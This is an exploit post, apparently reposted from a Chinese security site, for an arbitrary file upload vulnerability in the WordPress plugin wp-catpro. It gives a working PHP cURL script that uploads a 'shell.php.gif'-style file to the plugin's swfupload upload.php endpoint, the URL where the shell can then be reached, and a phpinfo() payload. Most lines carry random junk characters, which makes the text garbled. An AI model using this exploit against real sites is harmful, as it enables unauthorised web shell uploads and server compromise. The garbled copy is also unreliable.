Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability; L1 b2 } f0 e; I! {! e
#-----------------------------------------------------------------------, ?& f- }: Z) v9 y$ ^$ a
: J$ s1 ?, z9 {; t作者 => Zikou-16: h8 @7 r) `) y$ V
邮箱 => zikou16x@gmail.com! d) X6 @) V( {
测试系统 : Windows 7 , Backtrack 5r3
# p6 t: s7 R3 ^' t3 C; ] F下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip8 [( Z4 x; R4 h5 a ]1 ^
####2 p& m. ]9 f8 j' [/ Z
6 Q, n$ L" _& [! m* }
#=> Exploit 信息:, z3 B: {8 d3 \% G
------------------
2 X/ N6 h1 ?+ N9 m. U- p# 攻击者可以上传 file/shell.php.gif; K1 `' ]# R& I
# ("jpg", "gif", "png") // Allowed file extensions* m( W! }2 R4 V; ?9 a2 K
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
3 j+ M Q9 P) v _2 o' Y# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
J" S- Y6 ~' B2 ]------------------
$ l+ f! r3 c$ o$ p. D8 A
9 r$ G; x% ?* Z! ]" k3 M1 l- i" [#=> Exploit
% m! u. @5 b( u3 M-----------
! o0 h3 n/ {) H/ H<?php
# z: @7 Z+ _. }3 S/ H! @ $ A' c3 F) ^$ }3 r1 c. _6 Y" `4 Z
$uploadfile="zik.php.gif";
: d, d0 E9 t1 _7 R- q' L6 L+ ~$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
2 i2 f, M/ q7 c7 ocurl_setopt($ch, CURLOPT_POST, true);
. U9 [) T# z/ k& l% }& W6 @$ Kcurl_setopt($ch, CURLOPT_POSTFIELDS,
* m! J6 j+ J3 X* \- K- h2 e6 [( [array('Filedata'=>"@$uploadfile",1 n) e2 Q" D4 N3 j3 W% b
'folder'=>'/wp-content/uploads/catpro/'));
8 d9 D5 Q3 U6 L: `0 c% pcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
) K4 j/ B4 B" k: M2 p7 V, J4 O$postResult = curl_exec($ch);6 o9 X3 l5 U# b
curl_close($ch);' ^; o# s0 } o
( w1 F8 B0 c/ t: B+ l# gprint "$postResult";/ \# B# S, F/ _1 k* l0 c; W( A
3 h h2 P! _: f6 C2 u2 w/ m
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif9 I2 W n9 ?1 g, c! \0 M3 y7 a
?>
/ t( [* ?3 n9 W$ i<?php
6 x8 }$ o d; h: i# Bphpinfo();+ l+ W: H5 o- u5 G' Z
?> |